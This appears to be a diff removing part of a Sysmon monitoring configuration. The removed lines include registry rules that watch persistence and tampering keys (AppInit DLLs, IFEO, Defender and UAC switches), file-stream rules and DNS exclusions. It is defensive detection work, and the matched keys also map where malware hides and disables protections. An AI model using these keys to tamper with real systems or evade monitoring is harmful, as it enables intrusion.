-			<TargetObject name="T1103" condition="begin with">HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls\</TargetObject> <!--Windows: Feature disabled by default [ https://attack.mitre.org/wiki/Technique/T1103 ] -->
-			<TargetObject condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls\</TargetObject> <!--Windows: Credit to @Hexacorn [ http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ ] [ https://blog.comodo.com/malware/trojware-win32-trojanspy-volisk-a/ ] -->
-			<!--Office-->
-			<TargetObject name="T1137" condition="contains">Microsoft\Office\Outlook\Addins\</TargetObject> <!--Microsoft:Office: Outlook add-ins, access to sensitive data and often cause issues-->
-			<TargetObject name="T1137" condition="contains">Office Test\</TargetObject> <!-- Microsoft:Office: Persistence method [ http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/ ] | Credit @Hexacorn -->
-			<TargetObject name="Context,ProtectedModeExitOrMacrosUsed" condition="contains">Security\Trusted Documents\TrustRecords</TargetObject> <!--Microsoft:Office: Monitor when "Enable editing" or "Enable macros" is used | Credit @OutflankNL | [ https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/ ] -->
-			<!--IE-->
-			<TargetObject name="T1176" condition="contains">Internet Explorer\Toolbar\</TargetObject> <!--Microsoft:InternetExplorer: Machine and user [ Example: https://www.exterminate-it.com/malpedia/remove-mywebsearch ] -->
-			<TargetObject name="T1176" condition="contains">Internet Explorer\Extensions\</TargetObject> <!--Microsoft:InternetExplorer: Machine and user [ Example: https://www.exterminate-it.com/malpedia/remove-mywebsearch ] -->
-			<TargetObject name="T1176" condition="contains">Browser Helper Objects\</TargetObject> <!--Microsoft:InternetExplorer: Machine and user [ https://msdn.microsoft.com/en-us/library/bb250436(v=vs.85).aspx ] -->
-			<TargetObject condition="end with">\DisableSecuritySettingsCheck</TargetObject>
-			<TargetObject condition="end with">\3\1206</TargetObject> <!--Microsoft:InternetExplorer: Malware sometimes assures scripting is on in Internet Zone [ https://support.microsoft.com/en-us/help/182569/internet-explorer-security-zones-registry-entries-for-advanced-users ] -->
-			<TargetObject condition="end with">\3\2500</TargetObject> <!--Microsoft:InternetExplorer: Malware sometimes disables Protected Mode in Internet Zone [ https://blog.avast.com/2013/08/12/your-documents-are-corrupted-from-image-to-an-information-stealing-trojan/ ] -->
-			<TargetObject condition="end with">\3\1809</TargetObject> <!--Microsoft:InternetExplorer: Malware sometimes disables Pop-up Blocker in Internet Zone [ https://support.microsoft.com/en-us/help/182569/internet-explorer-security-zones-registry-entries-for-advanced-users ] -->
-			<!--Magic registry keys-->
-			<TargetObject condition="begin with">HKLM\Software\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\</TargetObject> <!--Windows: Thumbnail cache autostart [ http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-levels-up-with-new-autostart-mechanism/ ] -->
-			<TargetObject condition="begin with">HKLM\Software\Classes\WOW6432Node\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\</TargetObject> <!--Windows: Thumbnail cache autostart [ http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-levels-up-with-new-autostart-mechanism/ ] -->
-			<TargetObject condition="begin with">HKLM\Software\Classes\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\</TargetObject> <!--Windows: DirectX instances-->
-			<TargetObject condition="begin with">HKLM\Software\Classes\WOW6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\</TargetObject> <!--Windows: DirectX instances-->
-			<!--Install/Run artifacts-->
-			<TargetObject condition="end with">\UrlUpdateInfo</TargetObject> <!--Microsoft:ClickOnce: Source URL is stored in this value [ https://subt0x10.blogspot.com/2016/12/mimikatz-delivery-via-clickonce-with.html ] -->
-			<TargetObject condition="end with">\InstallSource</TargetObject> <!--Windows: Source folder for certain program and component installations-->
-			<TargetObject name="Alert,Sysinternals Tool Used" condition="end with">\EulaAccepted</TargetObject> <!--Sysinternals tool launched. Lots of useful abilities for attackers -->
-			<!--Antivirus tampering-->
-			<TargetObject name="T1089,Tamper-Defender" condition="end with">\DisableAntiSpyware</TargetObject> <!--Windows:Defender: State modified via registry-->
-			<TargetObject name="T1089,Tamper-Defender" condition="end with">\DisableAntiVirus</TargetObject> <!--Windows:Defender: State modified via registry-->
-			<TargetObject name="T1089,Tamper-Defender" condition="end with">\SpynetReporting</TargetObject> <!--Windows:Defender: State modified via registry-->
-			<TargetObject name="T1089,Tamper-Defender" condition="end with">DisableRealtimeMonitoring</TargetObject> <!--Windows:Defender: State modified via registry-->
-			<TargetObject name="T1089,Tamper-Defender" condition="end with">\SubmitSamplesConsent</TargetObject> <!--Windows:Defender: State modified via registry-->
-			<!--Windows UAC tampering-->
-			<TargetObject name="T1088" condition="end with">HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA</TargetObject> <!--Detect: UAC Tampering | Credit @ion-storm -->
-			<TargetObject name="T1088" condition="end with">HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy</TargetObject> <!--Detect: UAC Tampering | Credit @ion-storm -->
-			<!--Microsoft Security Center tampering | Credit @ion-storm -->
-			<TargetObject name="T1089,Tamper-SecCenter" condition="end with">HKLM\Software\Microsoft\Security Center\</TargetObject> <!-- [ https://attack.mitre.org/wiki/Technique/T1089 ] -->
-			<TargetObject name="T1089,Tamper-SecCenter" condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth</TargetObject> <!--Windows:Security Center: Malware sometimes disables [ https://blog.avast.com/2013/08/12/your-documents-are-corrupted-from-image-to-an-information-stealing-trojan/ ] -->
-			<!--Windows application compatibility-->
-			<TargetObject name="T1138,AppCompatShim" condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom</TargetObject> <!--Windows: AppCompat [ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html ] -->
-			<TargetObject name="T1138,AppCompatShim" condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB</TargetObject> <!--Windows: AppCompat [ https://attack.mitre.org/wiki/Technique/T1138 ] -->
-			<TargetObject condition="contains">VirtualStore</TargetObject> <!--Windows: Registry virtualization, something's wrong if it's in use [ https://msdn.microsoft.com/en-us/library/windows/desktop/aa965884(v=vs.85).aspx ] -->
-			<!--Windows internals integrity monitoring-->
-			<TargetObject name="T1183,IFEO" condition="begin with">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\</TargetObject> <!--Windows: Malware likes changing IFEO, like adding Debugger to disable antivirus EXE-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\</TargetObject> <!--Windows: Event log system integrity and ACLs-->
-			<TargetObject name="Tamper-Safemode" condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\Safeboot\</TargetObject> <!--Windows: Services approved to load in safe mode. Almost nothing should ever modify this.-->
-			<TargetObject name="Tamper-Winlogon" condition="begin with">HKLM\SYSTEM\CurrentControlSet\Control\Winlogon\</TargetObject> <!--Windows: Providers notified by WinLogon-->
-			<TargetObject name="Context,DeviceConntectedOrUpdated" condition="end with">\FriendlyName</TargetObject> <!--Windows: New devices connected and remembered-->
-			<TargetObject name="Context,MsiInstallerStarted" condition="is">HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\InProgress\(Default)</TargetObject> <!--Windows: See when WindowsInstaller is engaged, useful for timeline matching with other events-->
-			<TargetObject name="Tamper-Tracing" condition="begin with">HKLM\Software\Microsoft\Tracing\RASAPI32</TargetObject> <!--Windows: Malware sometimes disables tracing to obfuscate tracks-->
-			<!--Windows inventory events-->
-			<TargetObject name="InvDB-Path" condition="end with">\LowerCaseLongPath</TargetObject> <!-- [ https://binaryforay.blogspot.com/2017/10/amcache-still-rules-everything-around.html ] -->
-			<TargetObject name="InvDB-Pub" condition="end with">\Publisher</TargetObject> <!-- [ https://binaryforay.blogspot.com/2017/10/amcache-still-rules-everything-around.html ] -->
-			<TargetObject name="InvDB-Ver" condition="end with">\BinProductVersion</TargetObject> <!-- [ https://docs.microsoft.com/en-us/windows/privacy/basic-level-windows-diagnostic-events-and-fields-1709 ] -->
-			<TargetObject name="InvDB-DriverVer" condition="end with">\DriverVersion</TargetObject> <!-- [ https://df-stream.com/2015/02/leveraging-devicecontainers-key/ ] -->
-			<TargetObject name="InvDB-DriverVer" condition="end with">\DriverVerVersion</TargetObject> <!-- [ https://df-stream.com/2015/02/leveraging-devicecontainers-key/ ] -->
-			<TargetObject name="InvDB-CompileTimeClaim" condition="end with">\LinkDate</TargetObject> <!-- Compile time of EXE, may not be reliable [ https://en.wikipedia.org/wiki/Link_time ] -->
-			<TargetObject name="InvDB" condition="contains">Compatibility Assistant\Store\</TargetObject> <!-- Inventory -->
-			<!--Suspicious sources-->
-			<Image name="Suspicious,ImageBeginWithBackslash" condition="begin with">\</Image> <!--Devices and VSC shouldn't be executing changes | Credit: @SBousseaden @ionstorm @neu5ron @PerchedSystems [ https://twitter.com/SwiftOnSecurity/status/1133167323991486464 ] -->
-		</RegistryEvent>
-	</RuleGroup>
-
-	<RuleGroup name="" groupRelation="or">
-		<RegistryEvent onmatch="exclude">
-		<!--COMMENT:	Remove low-information noise. Often these hide a procress recreating an empty key and do not hide the values created subsequently.-->
-		<!--NOTE:	A lot of noise can be removed by excluding CreateKey events, which are largely innocuous-->
-			<TargetObject condition="contains">\{CAFEEFAC-</TargetObject>
-			<EventType condition="is">CreateKey</EventType>
-			<TargetObject condition="begin with">HKLM\COMPONENTS</TargetObject>
-			<!--Inventory noise-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache</TargetObject>
-			<!--Misc-->
-			<TargetObject condition="end with">Toolbar\WebBrowser</TargetObject> <!--Microsoft:IE: Extraneous activity-->
-			<TargetObject condition="end with">Browser\ITBar7Height</TargetObject> <!--Microsoft:IE: Extraneous activity, covers ShellBrowser and WebBrowser-->
-			<TargetObject condition="end with">Browser\ITBar7Layout</TargetObject> <!--Microsoft:IE: Extraneous activity-->
-			<TargetObject condition="end with">Internet Explorer\Toolbar\Locked</TargetObject> <!--Windows:Explorer: Extraneous activity-->
-			<TargetObject condition="end with">Toolbar\WebBrowser\{47833539-D0C5-4125-9FA8-0819E2EAAC93}</TargetObject> <!--Windows:Explorer: Extraneous activity-->
-			<TargetObject condition="end with">}\PreviousPolicyAreas</TargetObject> <!--Windows: Remove noise from \Winlogon\GPExtensions by svchost.exe-->
-			<TargetObject condition="contains">\Control\WMI\Autologger\</TargetObject> <!--Windows: Remove noise from monitoring "\Start"-->
-			<TargetObject condition="end with">HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc\Start</TargetObject> <!--Windows: Remove noise from monitoring "\Start"-->
-			<TargetObject condition="end with">\Lsa\OfflineJoin\CurrentValue</TargetObject> <!--Windows: Sensitive value during domain join-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\</TargetObject> <!--Windows: Remove noise monitoring installations run as system-->
-			<TargetObject condition="contains">_Classes\AppX</TargetObject> <!--Windows: Remove noise monitoring "Shell\open\command"--> <!--Win8+-->
-			<TargetObject condition="begin with">HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\</TargetObject> <!--Windows: SvcHost Noise-->
-			<!--Bootup Control noise-->
-			<TargetObject condition="end with">HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LsaPid</TargetObject> <!--Windows:lsass.exe: Boot noise-->
-			<TargetObject condition="end with">HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SspiCache</TargetObject> <!--Windows:lsass.exe: Boot noise--> <!--Win8+-->
-			<TargetObject condition="end with">HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Domains</TargetObject> <!--Windows:lsass.exe: Boot noise--> <!--Win8+-->
-			<!--Services startup settings noise, some low-risk services routinely change it and this can be ignored-->
-			<TargetObject condition="end with">\Services\BITS\Start</TargetObject> <!--Windows: Remove noise from monitoring "\Start"-->
-			<TargetObject condition="end with">\services\clr_optimization_v2.0.50727_32\Start</TargetObject> <!--Microsoft:dotNet: Windows 7-->
-			<TargetObject condition="end with">\services\clr_optimization_v2.0.50727_64\Start</TargetObject> <!--Microsoft:dotNet: Windows 7-->
-			<TargetObject condition="end with">\services\clr_optimization_v4.0.30319_32\Start</TargetObject> <!--Microsoft:dotNet: Windows 10-->
-			<TargetObject condition="end with">\services\clr_optimization_v4.0.30319_64\Start</TargetObject> <!--Microsoft:dotNet: Windows 10-->
-			<TargetObject condition="end with">\services\deviceAssociationService\Start</TargetObject> <!--Windows: Remove noise from monitoring "\Start"-->
-			<TargetObject condition="end with">\services\fhsvc\Start</TargetObject> <!--Windows: File History Service-->
-			<TargetObject condition="end with">\services\nal\Start</TargetObject> <!--Intel: Network adapter diagnostic driver-->
-			<TargetObject condition="end with">\services\trustedInstaller\Start</TargetObject> <!--Windows: Remove noise from monitoring "\Start"-->
-			<TargetObject condition="end with">\services\tunnel\Start</TargetObject> <!--Windows: Remove noise from monitoring "\Start"-->
-			<TargetObject condition="end with">\services\usoSvc\Start</TargetObject> <!--Windows: Remove noise from monitoring "\Start"-->
-			<!--FileExts noise filtering-->
-			<TargetObject condition="end with">\UserChoice\ProgId</TargetObject> <!--Windows: Remove noise from monitoring "FileExts"--> <!--Win8+-->
-			<TargetObject condition="end with">\UserChoice\Hash</TargetObject> <!--Windows: Remove noise from monitoring "FileExts"--> <!--Win8+-->
-			<TargetObject condition="end with">\OpenWithList\MRUList</TargetObject> <!--Windows: Remove noise from monitoring "FileExts"-->
-			<TargetObject condition="contains">Shell Extentions\Cached</TargetObject> <!--Windows: Remove noise generated by explorer.exe on monitored ShellCached binary keys--> <!--Win8+-->
-			<!--Group Policy noise-->
-			<TargetObject condition="end with">HKLM\System\CurrentControlSet\Control\Lsa\Audit\SpecialGroups</TargetObject> <!--Windows: Routinely set through Group Policy, not especially important to log-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\0\PSScriptOrder</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\0\SOM-ID</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\0\GPO-ID</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\0\0\IsPowershell</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\0\0\ExecTime</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\PSScriptOrder</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\SOM-ID</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\GPO-ID</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0\IsPowershell</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="end with">SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0\ExecTime</TargetObject> <!--Windows:Group Policy: Noise below the actual key while building-->
-			<TargetObject condition="contains">\safer\codeidentifiers\0\HASHES\{</TargetObject> <!--Windows: Software Restriction Policies. Can be used to disable security tools, but very noisy to monitor if you use it-->
-			<!--SECTION: Office C2R-->
-			<TargetObject condition="contains">VirtualStore\MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\</TargetObject> <!--Microsoft: SearchProtocolHost writes to OfficeC2R registry for Outlook, seemingly regarding mail indexing-->
-			<TargetObject condition="begin with">HKLM\SOFTWARE\Microsoft\Office\ClickToRun\</TargetObject> <!--Microsoft: Virtual registry for Office-->
-			<!--SECTION: 3rd party-->
-			<Image condition="is">C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe</Image> <!--Constantly writes to HKLM-->
-			<TargetObject condition="begin with">HKCR\VLC.</TargetObject> <!--VLC update noise-->
-			<TargetObject condition="begin with">HKCR\iTunes.</TargetObject> <!--Apple: iTunes update noise-->
-			<!--WINEVT publishers noise-->
-			<TargetObject condition="is">HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{945a8954-c147-4acd-923f-40c45405a658}</TargetObject> <!--Windows update-->
-		</RegistryEvent>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 15 : ALTERNATE DATA STREAM CREATED [FileCreateStreamHash]-->
-		<!--EVENT 15: "File stream created"-->
-		<!--COMMENT:	Any files created with an NTFS Alternate Data Stream which match these rules will be hashed and logged.
-			[ https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/ ]
-			ADS's are used by browsers and email clients to mark files as originating from the Internet or other foreign sources.
-			[ https://textslashplain.com/2016/04/04/downloads-and-the-mark-of-the-web/ ] -->
-		<!--NOTE: Other filesystem minifilters can make it appear to Sysmon that some files are being written twice. This is not a Sysmon issue, per Mark Russinovich.-->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, TargetFilename, CreationUtcTime, Hash-->
-		<FileCreateStreamHash onmatch="include">
-			<TargetFilename condition="contains">Downloads</TargetFilename> <!--Downloaded files. Does not include "Run" files in IE-->
-			<TargetFilename condition="contains">Temp\7z</TargetFilename> <!--7zip extractions-->
-			<TargetFilename condition="contains">Startup</TargetFilename> <!--ADS startup | Example: [ https://www.hybrid-analysis.com/sample/a314f6106633fba4b70f9d6ddbee452e8f8f44a72117749c21243dc93c7ed3ac?environmentId=100 ] -->
-			<TargetFilename condition="end with">.bat</TargetFilename> <!--Batch scripting-->
-			<TargetFilename condition="end with">.cmd</TargetFilename> <!--Batch scripting | Credit @ion-storm -->
-			<TargetFilename condition="end with">.doc</TargetFilename> <!--Office doc potentially with macro -->
-			<TargetFilename condition="end with">.hta</TargetFilename> <!--Scripting-->
-			<TargetFilename condition="end with">.lnk</TargetFilename> <!--Shortcut file | Credit @ion-storm -->
-			<TargetFilename condition="end with">.ppt</TargetFilename> <!--Office doc potentially with macros-->
-			<TargetFilename condition="end with">.ps1</TargetFilename> <!--PowerShell-->
-			<TargetFilename condition="end with">.ps2</TargetFilename> <!--PowerShell-->
-			<TargetFilename condition="end with">.reg</TargetFilename> <!--Registry File-->
-			<TargetFilename condition="end with">.jse</TargetFilename> <!--Registry File-->
-			<TargetFilename condition="end with">.vb</TargetFilename> <!--VisualBasicScripting files-->
-			<TargetFilename condition="end with">.vbe</TargetFilename> <!--VisualBasicScripting files-->
-			<TargetFilename condition="end with">.vbs</TargetFilename> <!--VisualBasicScripting files-->
-		</FileCreateStreamHash>
-
-	<RuleGroup name="" groupRelation="or">
-		<FileCreateStreamHash onmatch="exclude">
-		</FileCreateStreamHash>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 16 : SYSMON CONFIGURATION CHANGE-->
-		<!--EVENT 16: "Sysmon config state changed"-->
-		<!--COMMENT:	This ONLY logs if the hash of the configuration changes. Running "sysmon.exe -c" with the current configuration will not be logged with Event 16-->
-		
-		<!--DATA: UtcTime, Configuration, ConfigurationFileHash-->
-		<!--Cannot be filtered.-->
-
-	<!--SYSMON EVENT ID 17 & 18 : PIPE CREATED / PIPE CONNECTED [PipeEvent]-->
-		<!--EVENT 17: "Pipe Created"-->
-		<!--EVENT 18: "Pipe Connected"-->
-
-		<!--ADDITIONAL REFERENCE: [ https://www.cobaltstrike.com/help-smb-beacon ] -->
-		<!--ADDITIONAL REFERENCE: [ https://blog.cobaltstrike.com/2015/10/07/named-pipe-pivoting/ ] -->
-
-		<!--DATA: UtcTime, ProcessGuid, ProcessId, PipeName, Image-->
-	<RuleGroup name="" groupRelation="or">
-		<PipeEvent onmatch="include">
-			<!--NOTE: Using incide with no rules means nothing in this section will be logged-->
-		</PipeEvent>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 19 & 20 & 21 : WMI EVENT MONITORING [WmiEvent]-->
-		<!--EVENT 19: "WmiEventFilter activity detected"-->
-		<!--EVENT 20: "WmiEventConsumer activity detected"-->
-		<!--EVENT 21: "WmiEventConsumerToFilter activity detected"-->
-
-		<!--ADDITIONAL REFERENCE: [ https://www.darkoperator.com/blog/2017/10/15/sysinternals-sysmon-610-tracking-of-permanent-wmi-events ] -->
-		<!--ADDITIONAL REFERENCE: [ https://rawsec.lu/blog/posts/2017/Sep/19/sysmon-v610-vs-wmi-persistence/ ] -->
-
-		<!--DATA: EventType, UtcTime, Operation, User, Name, Type, Destination, Consumer, Filter-->
-	<RuleGroup name="" groupRelation="or">
-		<WmiEvent onmatch="exclude">
-			<!--NOTE: Using exclude with no rules means everything will be logged-->
-		</WmiEvent>
-	</RuleGroup>
-
-	<!--SYSMON EVENT ID 22 : DNS QUERY [DnsQuery]-->
-		<!--EVENT 22: "Dns query"-->
-
-		<!--NOTE:	Due to the volume of events that DNS queries generate, some orgs may want to remove this section from their configuration to reduce Sysmon log turnover. -->
-
-		<!--COMMENT:	DNS logging is a very nuanced challenge in monitoring due to event volume. Legitimate domains can be used to host malware/C2, but lookup itself is not very informative.
-						It's fine to exclude monitoring these bulk low-value lookups, but at same time, you would not have a full log of how malware communicated, potentially missing C2.
-						This section of Sysmon configuration will require your full judgement and knowledge of your org's priorities. There is no correct answer.-->
-
-		<!--OPERATIONS:	Chrome and Firefox prefetch DNS lookups, or use alternate DNS lookup methods Sysmon won't capture. You need to turn these off.
-						Search for Group Policy for these browsers to configure this.-->
-
-		<!--OPERATIONS:	Most DNS traffic is web advertising. To significantly reduce DNS queries and malware ads, enable client-side advertising filtering via Group Policy. This is easy.
-				Internet Explorer: https://decentsecurity.com/adblocking-for-internet-explorer-deployment/
-				Chrome: https://decentsecurity.com/ublock-for-google-chrome-deployment/
-				Firefox: ToDo
-						Also note, this configuration is designed for United States computers. Your country's users will may need customization to reduce noise.
-			-->
-
-		<!--CONFIG:	DNS poisoning is an issue during threat investigations. Try to only exclude ROUTINE system-level queries you know are strongly validated with HTTPS or code signing.-->
-		<!--CONFIG:	If you exclude microsoft.com, someone could register malware-microsoft.com and it wouldn't be logged. Use "END WITH" with leading . or "IS" operators.-->
-		<!--CONFIG:	Be very specific in exclusions. Threat actors use legitimate services, too. Dont exclude all of AWS or Azure or Google or CDNs!-->
-		<!--CONFIG: Popularity data: [ http://s3-us-west-1.amazonaws.com/umbrella-static/index.html ] [ https://better.fyi/trackers/alexa-top-500-news/ ] -->
-
-		<!--CRITICAL:	Do NOT exclude "wpad" lookups. This is a MitM vector routinely used by attackers. Disable WPAD or enforce client-side DNSSEC for AD domain lookups.-->
-		<!--CRITICAL:	Do NOT exclude IPv6 lookups.-->
-
-		<!--DATA: RuleName, UtcTime, ProcessGuid, ProcessId, QueryName, QueryType, QueryStatus, QueryResults (can't filter on)-->
-
-		<!--BELOW: These domains should not be excluded at the top level. Be specific if you want to reduce noise under them.-->
-		<!-- Rejected: .cloudapp.net, customer content [ https://blogs.technet.microsoft.com/ptsblog/2012/06/18/security-consideration-when-using-cloudapp-net-domain-as-production-environment-in-windows-azure/ ] -->
-		<!-- Rejected: .googleapis.com, customer content [ https://www.zdnet.com/article/this-business-email-scam-spreads-trojans-through-google-cloud-storage/ ] -->
-		<!-- Rejected: .cloudfront.net, customer content -->
-		<!-- Rejected: .windows.net, customer content -->
-		<!-- Rejected: *github.com, customer content, including open-source malware components -->
-
-	<RuleGroup name="" groupRelation="or">
-		<DnsQuery onmatch="exclude">
-			<!--Network noise-->
-			<QueryName condition="end with">.arpa.</QueryName> <!--Design decision to not log reverse DNS lookups. You will need to decide.-->
-			<QueryName condition="end with">.arpa</QueryName> <!--Design decision to not log reverse DNS lookups. You will need to decide.-->
-			<QueryName condition="end with">.msftncsi.com</QueryName> <!--Microsoft proxy detection | Microsoft default exclusion-->
-			<QueryName condition="is">..localmachine</QueryName>
-			<QueryName condition="is">localhost</QueryName>
-			<!--Microsoft-->
-			<QueryName condition="end with">-pushp.svc.ms</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
-			<QueryName condition="end with">.b-msedge.net</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
-			<QueryName condition="end with">.bing.com</QueryName> <!-- Microsoft | Microsoft default exclusion -->
-			<QueryName condition="end with">.hotmail.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.live.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.live.net</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.s-microsoft.com</QueryName> <!--Microsoft-->
-			<QueryName condition="end with">.microsoft.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.microsoftonline.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.microsoftstore.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.ms-acdc.office.com</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
-			<QueryName condition="end with">.msedge.net</QueryName> <!--Microsoft: Doesn't appear to host customer content or subdomains-->
-			<QueryName condition="end with">.msn.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.msocdn.com</QueryName> <!--Microsoft-->
-			<QueryName condition="end with">.skype.com</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.skype.net</QueryName> <!--Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.windows.com</QueryName> <!--Microsoft-->
-			<QueryName condition="end with">.windows.net.nsatc.net</QueryName> <!--Microsoft-->
-			<QueryName condition="end with">.windowsupdate.com</QueryName> <!--Microsoft-->
-			<QueryName condition="end with">.xboxlive.com</QueryName> <!--Microsoft-->
-			<QueryName condition="is">login.windows.net</QueryName> <!--Microsoft-->
-			<Image condition="begin with">C:\ProgramData\Microsoft\Windows Defender\Platform\</Image> <!--Microsoft: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/network-protection -->
-			<!--Microsoft:Office365/AzureAD-->
-			<QueryName condition="end with">.activedirectory.windowsazure.com</QueryName> <!--Microsoft: AzureAD-->
-			<QueryName condition="end with">.aria.microsoft.com</QueryName> <!--Microsoft: OneDrive/SharePoint-->
-			<QueryName condition="end with">.msauth.net</QueryName>
-			<QueryName condition="end with">.msftauth.net</QueryName>
-			<QueryName condition="end with">.opinsights.azure.com</QueryName> <!--Microsoft: AzureAD/InTune client event monitoring-->
-			<QueryName condition="end with">osi.office.net</QueryName> <!--Microsoft: Office-->
-			<QueryName condition="is">loki.delve.office.com</QueryName> <!--Microsoft: Office-->
-			<QueryName condition="is">management.azure.com</QueryName> <!--Microsoft: AzureAD/InTune-->
-			<QueryName condition="is">messaging.office.com</QueryName> <!--Microsoft: Office-->
-			<QueryName condition="is">outlook.office365.com</QueryName> <!--Microsoft: Protected by HSTS-->
-			<QueryName condition="is">portal.azure.com</QueryName> <!--Microsoft: AzureAD/InTune-->
-			<QueryName condition="is">protection.outlook.com</QueryName> <!--Microsoft: Office-->
-			<QueryName condition="is">substrate.office.com</QueryName> <!--Microsoft: Office-->
-			<!--3rd-party applications-->
-			<QueryName condition="end with">.mozaws.net</QueryName> <!--Mozilla-->
-			<QueryName condition="end with">.mozilla.com</QueryName> <!--Mozilla-->
-			<QueryName condition="end with">.mozilla.net</QueryName> <!--Mozilla-->
-			<QueryName condition="end with">.mozilla.org</QueryName> <!--Mozilla-->
-			<QueryName condition="end with">.spotify.com</QueryName> <!--Spotify-->
-			<QueryName condition="end with">.spotify.map.fastly.net</QueryName> <!--Spotify-->
-			<QueryName condition="is">clients1.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">clients2.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">clients3.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">clients4.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">clients5.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">clients6.google.com</QueryName> <!--Google-->
-			<QueryName condition="is">safebrowsing.googleapis.com</QueryName> <!--Google-->
-			<!--Goodlist CDN-->
-			<QueryName condition="end with">.akadns.net</QueryName> <!--AkamaiCDN, extensively used by Microsoft | Microsoft default exclusion-->
-			<QueryName condition="end with">.netflix.com</QueryName>
-			<QueryName condition="end with">aspnetcdn.com</QueryName> <!--Microsoft [ https://docs.microsoft.com/en-us/aspnet/ajax/cdn/overview ]-->
-			<QueryName condition="is">ajax.googleapis.com</QueryName>
-			<QueryName condition="is">cdnjs.cloudflare.com</QueryName> <!--Cloudflare: Hosts popular javascript libraries-->
-			<QueryName condition="is">fonts.googleapis.com</QueryName> <!--Google fonts-->
